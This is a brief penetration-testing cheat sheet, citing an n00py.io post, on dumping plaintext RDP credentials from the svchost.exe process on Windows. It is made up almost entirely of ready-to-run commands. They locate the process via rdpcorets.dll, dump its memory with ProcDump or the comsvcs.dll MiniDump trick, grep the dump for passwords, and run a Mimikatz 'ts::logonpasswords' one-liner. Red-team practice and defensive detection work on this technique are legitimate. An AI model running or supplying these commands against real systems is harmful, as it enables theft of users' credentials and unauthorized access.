# svchost.exe

* <https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/>

Locate the svchost.exe process that's holding RDP creds:

```
Cmd > tasklist /M:rdpcorets.dll
```

Use ProcDump or comsvc.dll to dump process memory:

```
Cmd > .\procdump64.exe -accepteula -64 -ma <PROCESS_PID> svchost.dmp
Cmd > rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <PROCESS_PID> C:\Windows\Temp\svchost.dmp full
```

Grep for plaintext passwords:

```
$ strings -el svchost.dmp | grep <USERNAME> -C1
```

## Mimikatz

```
Cmd > .\mimikatz.exe "privilege::debug" "token::elevate" "log out.txt" "ts::logonpasswords" "exit"
```